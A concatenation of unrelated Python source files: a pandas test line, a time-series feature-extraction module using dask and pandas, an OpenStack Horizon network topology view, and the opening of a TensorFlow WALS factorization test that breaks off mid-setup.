# Deprecated - see GH20239
assert mi.get_duplicates().equals(MultiIndex.from_arrays(
[[], []]))
tm.assert_numpy_array_equal(mi.duplicated(),
np.zeros(len(mi), dtype='bool'))
| |
import copy
from collections import Iterable
import numpy as np
import pandas as pd
import dask
import dask.threaded
from dask import delayed
from dask.compatibility import reraise
from dask.threaded import pack_exception
from sklearn.preprocessing import Imputer
from . import time_series
from .time_series import TimeSeries
from .features import generate_dask_graph
__all__ = ['featurize_time_series', 'featurize_single_ts',
'featurize_ts_files', 'assemble_featureset']
def featurize_single_ts(ts, features_to_use, custom_script_path=None,
custom_functions=None, raise_exceptions=True):
"""Compute feature values for a given single time-series. Data is
returned as dictionaries/lists of lists.
Parameters
----------
ts : TimeSeries object
Single time series to be featurized.
features_to_use : list of str
List of feature names to be generated.
custom_functions : dict, optional
Dictionary of custom feature functions to be evaluated for the given
time series, or a dictionary representing a dask graph of function
evaluations. Dictionaries of functions should have keys `feature_name`
and values functions that take arguments (t, m, e); in the case of a
dask graph, these arrays should be referenced as 't', 'm', 'e',
respectively, and any values with keys present in `features_to_use`
will be computed.
raise_exceptions : bool, optional
If True, exceptions during feature computation are raised immediately;
if False, exceptions are supressed and `np.nan` is returned for the
given feature and any dependent features. Defaults to True.
Returns
-------
dict
Dictionary with feature names as keys, lists of feature values (one per
channel) as values.
"""
# Initialize empty feature array for all channels
feature_values = np.empty((len(features_to_use), ts.n_channels))
for (t_i, m_i, e_i), i in zip(ts.channels(), range(ts.n_channels)):
feature_graph = generate_dask_graph(t_i, m_i, e_i)
feature_graph.update(ts.meta_features)
if custom_functions:
# If values in custom_functions are functions, add calls to graph
if all(hasattr(v, '__call__') for v in custom_functions.values()):
feature_graph.update({feat: f(t_i, m_i, e_i)
for feat, f in custom_functions.items()})
# Otherwise, custom_functions is another dask graph
else:
feature_graph.update(custom_functions)
# Do not execute in parallel; parallelization has already taken place
# at the level of time series, so we compute features for a single time
# series in serial.
if raise_exceptions:
raise_callback = reraise
else:
raise_callback = lambda e, tb: None
dask_values = dask.get(feature_graph, features_to_use,
raise_exception=raise_callback,
pack_exception=pack_exception)
feature_values[:, i] = [x if not isinstance(x, Exception) else np.nan
for x in dask_values]
index = pd.MultiIndex.from_product((features_to_use, range(ts.n_channels)),
names=('feature', 'channel'))
return pd.Series(feature_values.ravel(), index=index)
def assemble_featureset(features_list, time_series=None,
meta_features_list=None, names=None):
"""Transforms raw feature data (as returned by `featurize_single_ts`) into
a pd.DataFrame.
Parameters
----------
features_list : list of pd.Series
List of series (one per time series file) with (feature name, channel)
multiindex.
time_series : list of TimeSeries
If provided, the name and metafeatures from the time series objects
will be used, overriding the `meta_features_list` and `names` values.
meta_features_list : list of dict
If provided, the columns of `metadata` will be added to the featureset.
names : list of str
If provided, the (row) index of the featureset will be set accordingly.
Returns
-------
pd.DataFrame
DataFrame with columns containing feature values, indexed by name.
"""
if time_series is not None:
meta_features_list, names = zip(*[(ts.meta_features, ts.name)
for ts in time_series])
if len(features_list) > 0:
feat_df = pd.concat(features_list, axis=1, ignore_index=True).T
feat_df.index = names
else:
feat_df = pd.DataFrame(index=names)
if meta_features_list and any(meta_features_list): # not all empty dicts
meta_df = pd.DataFrame(list(meta_features_list), index=names)
meta_df.columns = pd.MultiIndex.from_tuples([(c, '') for c in meta_df],
names=['feature', 'channel'])
feat_df = pd.concat((feat_df, meta_df), axis=1)
return feat_df
# TODO should this be changed to use TimeSeries objects? or maybe an optional
# argument for TimeSeries? some redundancy here...
def featurize_time_series(times, values, errors=None, features_to_use=[],
meta_features={}, names=None,
custom_script_path=None, custom_functions=None,
scheduler=dask.threaded.get, raise_exceptions=True):
"""Versatile feature generation function for one or more time series.
For a single time series, inputs may have the form:
- `times`: (n,) array or (p, n) array (for p channels of measurement)
- `values`: (n,) array or (p, n) array (for p channels of measurement)
- `errors`: (n,) array or (p, n) array (for p channels of measurement)
For multiple time series, inputs may have the form:
- `times`: list of (n,) arrays, list of (p, n) arrays (for p channels of
measurement), or list of lists of (n,) arrays (for
multichannel data with different time values per channel)
- `values`: list of (n,) arrays, list of (p, n) arrays (for p channels of
measurement), or list of lists of (n,) arrays (for
multichannel data with different time values per channel)
- `errors`: list of (n,) arrays, list of (p, n) arrays (for p channels of
measurement), or list of lists of (n,) arrays (for
multichannel data with different time values per channel)
In the case of multichannel measurements, each channel will be
featurized separately, and the index of the output featureset will contain
a `channel` coordinate.
Parameters
----------
times : array, list of array, or list of lists of array
Array containing time values for a single time series, or a list of
arrays each containing time values for a single time series, or a list
of lists of arrays for multichannel data with different time values per
channel
values : array or list of array
Array containing measurement values for a single time series, or a list
of arrays each containing (possibly multivariate) measurement values
for a single time series, or a list of lists of arrays for multichannel
data with different time values per channel
errors : array or list/tuple of array, optional
Array containing measurement error values for a single time series, or
a list of arrays each containing (possibly multivariate) measurement
values for a single time series, or a list of lists of arrays for
multichannel data with different time values per channel
features_to_use : list of str, optional
List of feature names to be generated. Defaults to an empty list, which
will result in only meta_features features being stored.
meta_features : dict/Pandas.Series or list of dicts/Pandas.DataFrame
dict/Series (for a single time series) or DataFrame (for multiple time
series) of metafeature information; features are added to the output
featureset, and their values are consumable by custom feature scripts.
names : str or list of str, optional
Name or list of names for each time series, if applicable; will be
stored in the (row) index of the featureset.
custom_script_path : str, optional
Path to Python script containing function definitions for the
generation of any custom features. Defaults to None.
custom_functions : dict, optional
Dictionary of custom feature functions to be evaluated for the given
time series, or a dictionary representing a dask graph of function
evaluations. Dictionaries of functions should have keys `feature_name`
and values functions that take arguments (t, m, e); in the case of a
dask graph, these arrays should be referenced as 't', 'm', 'e',
respectively, and any values with keys present in `features_to_use`
will be computed.
scheduler : function, optional
`dask` scheduler function used to perform feature extraction
computation. Defaults to `dask.threaded.get`.
raise_exceptions : bool, optional
If True, exceptions during feature computation are raised immediately;
if False, exceptions are supressed and `np.nan` is returned for the
given feature and any dependent features. Defaults to True.
Returns
-------
pd.DataFrame
DataFrame with columns containing feature values, indexed by name.
"""
if times is None:
times = copy.deepcopy(values)
if isinstance(times, np.ndarray) and (times.ndim == 1
or 1 in times.shape):
times[:] = np.linspace(0., time_series.DEFAULT_MAX_TIME,
times.size)
else:
for t in times:
if isinstance(t, np.ndarray) and (t.ndim == 1 or 1 in t.shape):
t[:] = np.linspace(0., time_series.DEFAULT_MAX_TIME,
t.size)
else:
for t_i in t:
t_i[:] = np.linspace(0., time_series.DEFAULT_MAX_TIME,
t_i.size)
if errors is None:
errors = copy.deepcopy(values)
if isinstance(errors, np.ndarray) and (errors.ndim == 1
or 1 in errors.shape):
errors[:] = time_series.DEFAULT_ERROR_VALUE
else:
for e in errors:
if isinstance(e, np.ndarray) and (e.ndim == 1 or 1 in e.shape):
e[:] = time_series.DEFAULT_ERROR_VALUE
else:
for e_i in e:
e_i[:] = time_series.DEFAULT_ERROR_VALUE
# One single-channel time series:
if not isinstance(values[0], Iterable):
times, values, errors = [times], [values], [errors]
# One multi-channel time series:
elif isinstance(values, np.ndarray) and values.ndim == 2:
times, values, errors = [times], [values], [errors]
if names is None:
names = np.arange(len(times))
if isinstance(meta_features, pd.Series):
meta_features = meta_features.to_dict()
meta_features = pd.DataFrame(meta_features, index=names)
all_time_series = [delayed(TimeSeries(t, m, e,
meta_features=meta_features.loc[name],
name=name), pure=True)
for t, m, e, name in zip(times, values, errors, names)]
all_features = [delayed(featurize_single_ts, pure=True)(ts, features_to_use,
custom_script_path,
custom_functions,
raise_exceptions)
for ts in all_time_series]
result = delayed(assemble_featureset, pure=True)(all_features, all_time_series)
return result.compute(get=scheduler)
def featurize_ts_files(ts_paths, features_to_use, custom_script_path=None,
custom_functions=None, scheduler=dask.threaded.get,
raise_exceptions=True):
"""Feature generation function for on-disk time series (.npz) files.
By default, computes features concurrently using the
`dask.threaded.get` scheduler. Other possible options include
`dask.local.get` for synchronous computation (e.g., when debugging),
or `dask.distributed.Executor.get` for distributed computation.
In the case of multichannel measurements, each channel will be
featurized separately, and the index of the output featureset will contain
a `channel` coordinate.
Parameters
----------
ts_paths : list of str
List of paths to time series data, stored in `numpy` .npz format.
See `time_series.load` for details.
features_to_use : list of str, optional
List of feature names to be generated. Defaults to an empty list, which
will result in only meta_features features being stored.
custom_script_path : str, optional
Path to Python script containing function definitions for the
generation of any custom features. Defaults to None.
custom_functions : dict, optional
Dictionary of custom feature functions to be evaluated for the given
time series, or a dictionary representing a dask graph of function
evaluations. Dictionaries of functions should have keys `feature_name`
and values functions that take arguments (t, m, e); in the case of a
dask graph, these arrays should be referenced as 't', 'm', 'e',
respectively, and any values with keys present in `features_to_use`
will be computed.
scheduler : function, optional
`dask` scheduler function used to perform feature extraction
computation. Defaults to `dask.threaded.get`.
raise_exceptions : bool, optional
If True, exceptions during feature computation are raised immediately;
if False, exceptions are supressed and `np.nan` is returned for the
given feature and any dependent features. Defaults to True.
Returns
-------
pd.DataFrame
DataFrame with columns containing feature values, indexed by name.
"""
all_time_series = [delayed(time_series.load, pure=True)(ts_path)
for ts_path in ts_paths]
all_features = [delayed(featurize_single_ts, pure=True)(ts, features_to_use,
custom_script_path,
custom_functions,
raise_exceptions)
for ts in all_time_series]
names, meta_feats, all_labels = zip(*[(ts.name, ts.meta_features, ts.label)
for ts in all_time_series])
result = delayed(assemble_featureset, pure=True)(all_features,
meta_features_list=meta_feats,
names=names)
fset, labels = dask.compute(result, all_labels, get=scheduler)
return fset, labels
def impute_featureset(fset, strategy='constant', value=None, max_value=1e20,
inplace=False):
"""Replace NaN/Inf values with imputed values as defined by `strategy`.
Output should satisfy `sklearn.validation.assert_all_finite` so that
training a model will not produce an error.
Parameters
----------
strategy : str, optional
The imputation strategy. Defaults to 'constant'.
- 'constant': replace all missing with `value`
- 'mean': replace all missing with mean along `axis`
- 'median': replace all missing with median along `axis`
- 'most_frequent': replace all missing with mode along `axis`
value : float or None, optional
Replacement value to use for `strategy='constant'`. Defaults to
`None`, in which case a very large negative value is used (a
good choice for e.g. random forests).
max_value : float, optional
Maximum (absolute) value above which values are treated as infinite.
Used to prevent overflow when fitting `sklearn` models.
inplace : bool, optional
If True, fill in place. If False, return a copy.
Returns
-------
pd.DataFrame
Feature data frame wth no missing/infinite values.
"""
if not inplace:
fset = fset.copy()
fset.values[np.isnan(fset.values)] = np.inf # avoid NaN comparison warnings
fset.values[np.abs(fset.values) > max_value] = np.nan
if strategy == 'constant':
if value is None:
# If no fill-in value is provided, use a large negative value
value = -2. * np.nanmax(np.abs(fset.values))
fset.fillna(value, inplace=True)
elif strategy in ('mean', 'median', 'most_frequent'):
imputer = Imputer(strategy=strategy, axis=0)
fset.values[:] = imputer.fit_transform(fset.values)
else:
raise NotImplementedError("Imputation strategy '{}' not"
"recognized.".format(strategy))
return fset
def save_featureset(fset, path, **kwargs):
"""Save feature DataFrame in .npz format.
Can optionally store class labels/targets and other metadata. All other
keyword arguments will be passed on to `np.savez`; data frames are saved as
record arrays and converted back into data frames by `load_featureset`.
Parameters
----------
fset : pd.DataFrame
Feature data frame to be saved.
path : str
Path to store feature data.
kwargs : dict of array or data frame
Additional keyword arguments, e.g.:
labels -> class labels
preds -> predicted class labels
pred_probs -> (n_sample, n_class) data frame of class probabilities
"""
# Transpose to properly handle MultiIndex columns
kwargs['features'] = fset.T
for k, v in kwargs.items():
if isinstance(v, pd.DataFrame):
arr = v.to_records()
dt_list = arr.dtype.descr
# Change type of indices from object to str
for i, (name, dt) in enumerate(dt_list):
if dt.endswith('O'):
size = max(len(x) for x in arr['index'])
dt_list[i] = (name, 'U' + str(size))
dt_list[i] = (str(name),) + dt_list[i][1:] # avoid Py2 unicode
kwargs[k] = arr.astype(dt_list)
# Ignore null values, e.g. for unlabeled data
if all(el is None for el in v):
kwargs[k] = []
# Bypass savez to allow for `allow_pickle` keyword
# See https://github.com/numpy/numpy/pull/5770
np.lib.npyio._savez(path, [], kwargs, compress=True, allow_pickle=False)
def load_featureset(path):
"""Load feature DataFrame from .npz file.
Feature information is returned as a single DataFrame, while any other
arrays that were saved (class labels/predictions, etc.) are returned in a
single dictionary.
Parameters
----------
path : str
Path where feature data is stored.
Returns
-------
pd.DataFrame
Feature data frame to be saved.
dict
Additional variables passed to `save_featureset`, including labels, etc.
"""
with np.load(path, allow_pickle=False) as npz_file:
data = dict(npz_file)
# Transpose to properly handle MultiIndex columns
fset = pd.DataFrame.from_records(data.pop('features'),
index=['feature', 'channel']).T
features, channels = zip(*fset.columns)
channels = [int(c) if c != '' else '' for c in channels]
fset.columns = pd.MultiIndex.from_tuples(list(zip(features, channels)),
names=['feature', 'channel'])
for k, v in data.items():
if len(v.dtype) > 0:
data[k] = pd.DataFrame.from_records(v, index='index')
return fset, data
| |
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2013 NTT MCL Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
from django.conf import settings
from django.http import HttpResponse
from django.urls import reverse
from django.urls import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from django.views.generic import View
from horizon import exceptions
from horizon import tabs
from horizon.utils.lazy_encoder import LazyTranslationEncoder
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.network_topology import forms
from openstack_dashboard.dashboards.project.network_topology.instances \
import tables as instances_tables
from openstack_dashboard.dashboards.project.network_topology.networks \
import tables as networks_tables
from openstack_dashboard.dashboards.project.network_topology.ports \
import tables as ports_tables
from openstack_dashboard.dashboards.project.network_topology.routers \
import tables as routers_tables
from openstack_dashboard.dashboards.project.network_topology.subnets \
import tables as subnets_tables
from openstack_dashboard.dashboards.project.network_topology \
import tabs as topology_tabs
from openstack_dashboard.dashboards.project.network_topology import utils
from openstack_dashboard.dashboards.project.instances.tables import \
STATUS_DISPLAY_CHOICES as instance_choices
from openstack_dashboard.dashboards.project.instances import\
views as i_views
from openstack_dashboard.dashboards.project.instances.workflows import\
create_instance as i_workflows
from openstack_dashboard.dashboards.project.networks.subnets import\
views as s_views
from openstack_dashboard.dashboards.project.networks.subnets import\
workflows as s_workflows
from openstack_dashboard.dashboards.project.networks.tables import \
DISPLAY_CHOICES as network_display_choices
from openstack_dashboard.dashboards.project.networks.tables import \
STATUS_DISPLAY_CHOICES as network_choices
from openstack_dashboard.dashboards.project.networks import\
views as n_views
from openstack_dashboard.dashboards.project.networks import\
workflows as n_workflows
from openstack_dashboard.dashboards.project.routers.ports.tables import \
DISPLAY_CHOICES as ports_choices
from openstack_dashboard.dashboards.project.routers.ports.tables import \
STATUS_DISPLAY_CHOICES as ports_status_choices
from openstack_dashboard.dashboards.project.routers.ports import\
views as p_views
from openstack_dashboard.dashboards.project.routers.tables import \
ADMIN_STATE_DISPLAY_CHOICES as routers_admin_choices
from openstack_dashboard.dashboards.project.routers.tables import \
STATUS_DISPLAY_CHOICES as routers_status_choices
from openstack_dashboard.dashboards.project.routers import\
views as r_views
from openstack_dashboard import policy
# List of known server statuses that wont connect to the console
console_invalid_status = {
'shutoff', 'suspended', 'resize', 'verify_resize',
'revert_resize', 'migrating', 'build', 'shelved',
'shelved_offloaded'}
class TranslationHelper(object):
"""Helper class to provide the translations.
This allows the network topology to access the translated strings
for various resources defined in other parts of the code.
"""
def __init__(self):
# turn translation tuples into dicts for easy access
self.instance = dict(instance_choices)
self.network = dict(network_choices)
self.network.update(dict(network_display_choices))
self.router = dict(routers_admin_choices)
self.router.update(dict(routers_status_choices))
self.port = dict(ports_choices)
self.port.update(dict(ports_status_choices))
# and turn all the keys into Uppercase for simple access
self.instance = {k.upper(): v for k, v in self.instance.items()}
self.network = {k.upper(): v for k, v in self.network.items()}
self.router = {k.upper(): v for k, v in self.router.items()}
self.port = {k.upper(): v for k, v in self.port.items()}
class NTAddInterfaceView(p_views.AddInterfaceView):
success_url = "horizon:project:network_topology:index"
failure_url = "horizon:project:network_topology:index"
def get_success_url(self):
return reverse("horizon:project:network_topology:index")
def get_context_data(self, **kwargs):
context = super(NTAddInterfaceView, self).get_context_data(**kwargs)
context['form_url'] = 'horizon:project:network_topology:interface'
return context
class NTCreateRouterView(r_views.CreateView):
form_class = forms.NTCreateRouterForm
success_url = reverse_lazy("horizon:project:network_topology:index")
submit_url = reverse_lazy("horizon:project:network_topology:createrouter")
page_title = _("Create a Router")
class NTCreateNetwork(n_workflows.CreateNetwork):
def get_success_url(self):
return reverse("horizon:project:network_topology:index")
def get_failure_url(self):
return reverse("horizon:project:network_topology:index")
class NTCreateNetworkView(n_views.CreateView):
workflow_class = NTCreateNetwork
class NTLaunchInstance(i_workflows.LaunchInstance):
success_url = "horizon:project:network_topology:index"
class NTLaunchInstanceView(i_views.LaunchInstanceView):
workflow_class = NTLaunchInstance
class NTCreateSubnet(s_workflows.CreateSubnet):
def get_success_url(self):
return reverse("horizon:project:network_topology:index")
def get_failure_url(self):
return reverse("horizon:project:network_topology:index")
class NTCreateSubnetView(s_views.CreateView):
workflow_class = NTCreateSubnet
class InstanceView(i_views.IndexView):
table_class = instances_tables.InstancesTable
template_name = 'project/network_topology/iframe.html'
def get_data(self):
self._more = False
# Get instance by id, return a list of one instance
# If failed to retrieve the instance, return an empty list
try:
instance_id = self.request.GET.get("id", "")
instance = api.nova.server_get(self.request, instance_id)
return [instance]
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve the instance.'))
return []
class RouterView(r_views.IndexView):
table_class = routers_tables.RoutersTable
template_name = 'project/network_topology/iframe.html'
class NetworkView(n_views.IndexView):
table_class = networks_tables.NetworksTable
template_name = 'project/network_topology/iframe.html'
class RouterDetailView(r_views.DetailView):
table_classes = (ports_tables.PortsTable, )
template_name = 'project/network_topology/iframe.html'
def get_interfaces_data(self):
pass
class NetworkDetailView(n_views.DetailView):
table_classes = (subnets_tables.SubnetsTable, )
template_name = 'project/network_topology/iframe.html'
class NetworkTopologyView(tabs.TabView):
tab_group_class = topology_tabs.TopologyTabs
template_name = 'project/network_topology/index.html'
page_title = _("Network Topology")
def get_context_data(self, **kwargs):
context = super(NetworkTopologyView, self).get_context_data(**kwargs)
return utils.get_context(self.request, context)
class JSONView(View):
trans = TranslationHelper()
@property
def is_router_enabled(self):
network_config = getattr(settings, 'OPENSTACK_NEUTRON_NETWORK', {})
return network_config.get('enable_router', True)
def add_resource_url(self, view, resources):
tenant_id = self.request.user.tenant_id
for resource in resources:
if (resource.get('tenant_id') and
tenant_id != resource.get('tenant_id')):
continue
resource['url'] = reverse(view, None, [str(resource['id'])])
def _check_router_external_port(self, ports, router_id, network_id):
for port in ports:
if (port['network_id'] == network_id and
port['device_id'] == router_id):
return True
return False
def _get_servers(self, request):
# Get nova data
try:
servers, more = api.nova.server_list(request)
except Exception:
servers = []
data = []
console_type = getattr(settings, 'CONSOLE_TYPE', 'AUTO')
# lowercase of the keys will be used at the end of the console URL.
for server in servers:
server_data = {'name': server.name,
'status': self.trans.instance[server.status],
'original_status': server.status,
'task': getattr(server, 'OS-EXT-STS:task_state'),
'id': server.id}
# Avoid doing extra calls for console if the server is in
# a invalid status for console connection
if server.status.lower() not in console_invalid_status:
if console_type:
server_data['console'] = 'auto_console'
data.append(server_data)
self.add_resource_url('horizon:project:instances:detail', data)
return data
def _get_networks(self, request):
# Get neutron data
# if we didn't specify tenant_id, all networks shown as admin user.
# so it is need to specify the networks. However there is no need to
# specify tenant_id for subnet. The subnet which belongs to the public
# network is needed to draw subnet information on public network.
try:
# NOTE(amotoki):
# To support auto allocated network in the network topology view,
# we need to handle the auto allocated network which haven't been
# created yet. The current network topology logic cannot not handle
# fake network ID properly, so we temporarily exclude
# pre-auto-allocated-network from the network topology view.
# It would be nice if someone is interested in supporting it.
neutron_networks = api.neutron.network_list_for_tenant(
request,
request.user.tenant_id,
include_pre_auto_allocate=False)
except Exception:
neutron_networks = []
networks = []
for network in neutron_networks:
allow_delete_subnet = policy.check(
(("network", "delete_subnet"),),
request,
target={'network:tenant_id': getattr(network,
'tenant_id', None)}
)
obj = {'name': network.name_or_id,
'id': network.id,
'subnets': [{'id': subnet.id,
'cidr': subnet.cidr}
for subnet in network.subnets],
'status': self.trans.network[network.status],
'allow_delete_subnet': allow_delete_subnet,
'original_status': network.status,
'router:external': network['router:external']}
self.add_resource_url('horizon:project:networks:subnets:detail',
obj['subnets'])
networks.append(obj)
# Add public networks to the networks list
if self.is_router_enabled:
try:
neutron_public_networks = api.neutron.network_list(
request,
**{'router:external': True})
except Exception:
neutron_public_networks = []
my_network_ids = [net['id'] for net in networks]
for publicnet in neutron_public_networks:
if publicnet.id in my_network_ids:
continue
try:
subnets = [{'id': subnet.id,
'cidr': subnet.cidr}
for subnet in publicnet.subnets]
self.add_resource_url(
'horizon:project:networks:subnets:detail', subnets)
except Exception:
subnets = []
networks.append({
'name': publicnet.name_or_id,
'id': publicnet.id,
'subnets': subnets,
'status': self.trans.network[publicnet.status],
'original_status': publicnet.status,
'router:external': publicnet['router:external']})
self.add_resource_url('horizon:project:networks:detail',
networks)
return sorted(networks,
key=lambda x: x.get('router:external'),
reverse=True)
def _get_routers(self, request):
if not self.is_router_enabled:
return []
try:
neutron_routers = api.neutron.router_list(
request,
tenant_id=request.user.tenant_id)
except Exception:
neutron_routers = []
routers = [{'id': router.id,
'name': router.name_or_id,
'status': self.trans.router[router.status],
'original_status': router.status,
'external_gateway_info': router.external_gateway_info}
for router in neutron_routers]
self.add_resource_url('horizon:project:routers:detail', routers)
return routers
def _get_ports(self, request, networks):
try:
neutron_ports = api.neutron.port_list(request)
except Exception:
neutron_ports = []
# we should filter out ports connected to non tenant networks
# which they have no visibility to
tenant_network_ids = [network['id'] for network in networks]
ports = [{'id': port.id,
'network_id': port.network_id,
'device_id': port.device_id,
'fixed_ips': port.fixed_ips,
'device_owner': port.device_owner,
'status': self.trans.port[port.status],
'original_status': port.status}
for port in neutron_ports
if (port.device_owner != 'network:router_ha_interface' and
port.network_id in tenant_network_ids)]
self.add_resource_url('horizon:project:networks:ports:detail',
ports)
return ports
def _prepare_gateway_ports(self, routers, ports):
# user can't see port on external network. so we are
# adding fake port based on router information
for router in routers:
external_gateway_info = router.get('external_gateway_info')
if not external_gateway_info:
continue
external_network = external_gateway_info.get(
'network_id')
if not external_network:
continue
if self._check_router_external_port(ports,
router['id'],
external_network):
continue
fake_port = {'id': 'gateway%s' % external_network,
'network_id': external_network,
'device_id': router['id'],
'fixed_ips': []}
ports.append(fake_port)
def get(self, request, *args, **kwargs):
networks = self._get_networks(request)
data = {'servers': self._get_servers(request),
'networks': networks,
'ports': self._get_ports(request, networks),
'routers': self._get_routers(request)}
self._prepare_gateway_ports(data['routers'], data['ports'])
json_string = json.dumps(data, cls=LazyTranslationEncoder,
ensure_ascii=False)
return HttpResponse(json_string, content_type='text/json')
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for WALSMatrixFactorization."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import json
import numpy as np
from tensorflow.contrib.factorization.python.ops import factorization_ops_test_utils
from tensorflow.contrib.factorization.python.ops import wals as wals_lib
from tensorflow.contrib.learn.python.learn import run_config
from tensorflow.contrib.learn.python.learn.estimators import model_fn
from tensorflow.contrib.learn.python.learn.estimators import run_config as run_config_lib
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import embedding_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import input as input_lib
from tensorflow.python.training import monitored_session
class WALSMatrixFactorizationTest(test.TestCase):
INPUT_MATRIX = factorization_ops_test_utils.INPUT_MATRIX
def np_array_to_sparse(self, np_array):
"""Transforms an np.array to a tf.SparseTensor."""
return factorization_ops_test_utils.np_matrix_to_tf_sparse(np_array)
def calculate_loss(self):
"""Calculates the loss of the current (trained) model."""
current_rows = embedding_ops.embedding_lookup(
self._model.get_row_factors(), math_ops.range(self._num_rows),
partition_strategy='div')
current_cols = embedding_ops.embedding_lookup(
self._model.get_col_factors(), math_ops.range(self._num_cols),
partition_strategy='div')
row_wts = embedding_ops.embedding_lookup(
self._row_weights, math_ops.range(self._num_rows),
partition_strategy='div')
col_wts = embedding_ops.embedding_lookup(
self._col_weights, math_ops.range(self._num_cols),
partition_strategy='div')
sp_inputs = self.np_array_to_sparse(self.INPUT_MATRIX)
return factorization_ops_test_utils.calculate_loss(
sp_inputs, current_rows, current_cols, self._regularization_coeff,
self._unobserved_weight, row_wts, col_wts)
# TODO(walidk): Replace with input_reader_utils functions once open sourced.
def remap_sparse_tensor_rows(self, sp_x, row_ids, shape):
"""Remaps the row ids of a tf.SparseTensor."""
old_row_ids, old_col_ids = array_ops.split(
value=sp_x.indices, num_or_size_splits=2, axis=1)
new_row_ids = array_ops.gather(row_ids, old_row_ids)
new_indices = array_ops.concat([new_row_ids, old_col_ids], 1)
return sparse_tensor.SparseTensor(
indices=new_indices, values=sp_x.values, dense_shape=shape)
# TODO(walidk): Add an option to shuffle inputs.
def input_fn(self, np_matrix, batch_size, mode,
project_row=None, projection_weights=None,
remove_empty_rows_columns=False):
"""Returns an input_fn that selects row and col batches from np_matrix.
This simple utility creates an input function from a numpy_array. The
following transformations are performed:
* The empty rows and columns in np_matrix are removed (if
remove_empty_rows_columns is true)
* np_matrix is converted to a SparseTensor.
* The rows of the sparse matrix (and the rows of its transpose) are batched.
* A features dictionary is created, which contains the row / column batches.
In TRAIN mode, one only needs to specify the np_matrix and the batch_size.
In INFER and EVAL modes, one must also provide project_row, a boolean which
specifies whether we are projecting rows or columns.
Args:
np_matrix: A numpy array. The input matrix to use.
batch_size: Integer.
mode: Can be one of model_fn.ModeKeys.{TRAIN, INFER, EVAL}.
project_row: A boolean. Used in INFER and EVAL modes. Specifies whether
to project rows or columns.
projection_weights: A float numpy array. Used in INFER mode. Specifies
the weights to use in the projection (the weights are optional, and
default to 1.).
remove_empty_rows_columns: A boolean. When true, this will remove empty
rows and columns in the np_matrix. Note that this will result in
modifying the indices of the input matrix. The mapping from new indices
to old indices is returned in the form of two numpy arrays.
Returns:
A tuple consisting of:
_fn: A callable. Calling _fn returns a features dict.
nz_row_ids: A numpy array of the ids of non-empty rows, such that
nz_row_ids[i] is the old row index corresponding to new index i.
nz_col_ids: A numpy array of the ids of non-empty columns, such that
nz_col_ids[j] is the old column index corresponding to new index j.
"""
if remove_empty_rows_columns:
np_matrix, nz_row_ids, nz_col_ids = (
factorization_ops_test_utils.remove_empty_rows_columns(np_matrix))
else:
nz_row_ids = np.arange(np.shape(np_matrix)[0])
nz_col_ids = np.arange(np.shape(np_matrix)[1])
def extract_features(row_batch, col_batch, num_rows, num_cols):
row_ids = row_batch[0]
col_ids = col_batch[0]
rows = self.remap_sparse_tensor_rows(
row_batch[1], row_ids, shape=[num_rows, num_cols])
cols = self.remap_sparse_tensor_rows(
col_batch[1], col_ids, shape=[num_cols, num_rows])
features = {
wals_lib.WALSMatrixFactorization.INPUT_ROWS: rows,
wals_lib.WALSMatrixFactorization.INPUT_COLS: cols,
}
return features
def _fn():
num_rows = np.shape(np_matrix)[0]
num_cols = np.shape(np_matrix)[1]
row_ids = math_ops.range(num_rows, dtype=dtypes.int64)
col_ids = math_ops.range(num_cols, dtype=dtypes.int64)
sp_mat = self.np_array_to_sparse(np_matrix)
sp_mat_t = sparse_ops.sparse_transpose(sp_mat)
row_batch = input_lib.batch(
[row_ids, sp_mat],
batch_size=min(batch_size, num_rows),
capacity=10,
enqueue_many=True)
col_batch = input_lib.batch(
[col_ids, sp_mat_t],
batch_size=min(batch_size, num_cols),
capacity=10,
enqueue_many=True)
features = extract_features(row_batch, col_batch, num_rows, num_cols)
if mode == model_fn.ModeKeys.INFER or mode == model_fn.ModeKeys.EVAL:
self.assertTrue(
project_row is not None,
msg='project_row must be specified in INFER or EVAL mode.')
features[wals_lib.WALSMatrixFactorization.PROJECT_ROW] = (
constant_op.constant(project_row))
if mode == model_fn.ModeKeys.INFER and projection_weights is not None:
weights_batch = input_lib.batch(
projection_weights,
batch_size=batch_size,
capacity=10,
enqueue_many=True)
features[wals_lib.WALSMatrixFactorization.PROJECTION_WEIGHTS] = (
weights_batch)
labels = None
return features, labels
return _fn, nz_row_ids, nz_col_ids
@property
def input_matrix(self):
return self.INPUT_MATRIX
@property
def row_steps(self):
return np.ceil(self._num_rows / self.batch_size)
@property
def col_steps(self):
return np.ceil(self._num_cols / self.batch_size)
@property
def batch_size(self):
return 5
@property
def use_cache(self):
return False
@property
def max_sweeps(self):
return None
def setUp(self):
self._num_rows = 5
self._num_cols = 7
self._embedding_dimension = 3
self._unobserved_weight = 0.1
self._num_row_shards = 2
self._num_col_shards = 3
self._regularization_coeff = 0.01
self._col_init = [
# Shard 0.
[[-0.36444709, -0.39077035, -0.32528427],
[1.19056475, 0.07231052, 2.11834812],
[0.93468881, -0.71099287, 1.91826844]],
